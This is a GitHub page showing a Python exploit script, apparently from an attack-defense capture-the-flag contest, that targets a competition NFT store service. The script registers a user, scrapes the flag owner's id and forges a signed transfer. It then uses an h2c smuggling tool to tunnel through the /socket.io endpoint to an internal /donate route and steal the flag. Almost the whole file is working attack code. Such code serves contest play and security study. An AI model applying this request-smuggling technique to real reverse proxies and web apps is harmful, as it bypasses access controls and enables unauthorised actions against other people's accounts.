This repository has been archived by the owner on May 25, 2023. It is now read-only.
-
Notifications
You must be signed in to change notification settings - Fork 8
/
Copy pathservice1-store1-vuln1-h2csmuggling.py
executable file
·87 lines (69 loc) · 2.38 KB
/
service1-store1-vuln1-h2csmuggling.py
1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
16
17
18
19
20
21
22
23
24
25
26
27
28
29
30
31
32
33
34
35
36
37
38
39
40
41
42
43
44
45
46
47
48
49
50
51
52
53
54
55
56
57
58
59
60
61
62
63
64
65
66
67
68
69
70
71
72
73
74
75
76
77
78
79
80
81
82
83
84
85
86
87
#!/usr/bin/env python3
import subprocess
import sys
import requests
import random
import string
import re
import json
import re
from service1_common import *
# This exploit uses the h2c smuggling tunnel to donate to self the flag.
# Other than donate, it is possible to do a lot of other attacks against transactions.
def randstr(n, l=False, dictionary=string.ascii_letters):
if l:
n = random.randint(n, l)
return ''.join([random.choice(dictionary) for _ in range(n)])
def create_user_cred():
username = randstr(6, 9)
password = randstr(6, 9)
return username, password
def exploit(ip, flag_id):
base_url = f'http://{ip}:3003'
sess = requests.Session()
username, password = create_user_cred()
client = Client(ip, username, password)
key = Key()
# register an account
client.register_user()
# Retrieve the flag user id
flag_page = requests.get(base_url + '/view/' + flag_id)
user_regex = r'href="/user/(.*)" '
flag_user_id = re.findall(user_regex, flag_page.text)
try:
flag_user_id = flag_user_id[0]
except:
print('Cannot retrieve the flag owner user_id')
quit()
# Retrieve our user id
index = client.sess.get(base_url)
user_regex = r' user_id: \'(.*)\''
user_id = re.findall(user_regex, index.text)
try:
user_id = user_id[0]
except:
print('Cannot retrieve our owner user_id')
quit()
blob = f"{{\"nft_id\":\"{flag_id}\",\"from_addr\":\"{flag_user_id}\",\"to_addr\":\"{user_id}\"}}"
signature = client.key.sign(blob)
privkey, pubkey = client.key.get_keys_hex()
data = {
'nft_id': flag_id,
'from_addr': flag_user_id,
'to_addr': user_id,
'pubkey': pubkey,
'signature': signature
}
payload = json.dumps(data)
# Call h2c-smuggler
payload_length = len(payload)
cmd_line = f"python3 service1-h2c-smuggler.py -x 'http://{ip}:3003/socket.io' -H 'Content-Type: application/json' -H 'Content-Length: {payload_length}' -X POST --data '{payload}' http://localhost/donate"
with open('/dev/null', 'w') as devnull:
subprocess.run(cmd_line, shell=True, stdout=devnull)
resp = client.sess.get(base_url + '/dashboard')
return find_flag(resp.text)[0]
if __name__ == "__main__":
team_id = sys.argv[1]
flag_id = sys.argv[2]
ip = f"10.60.{team_id}.1"
print(exploit(ip, flag_id))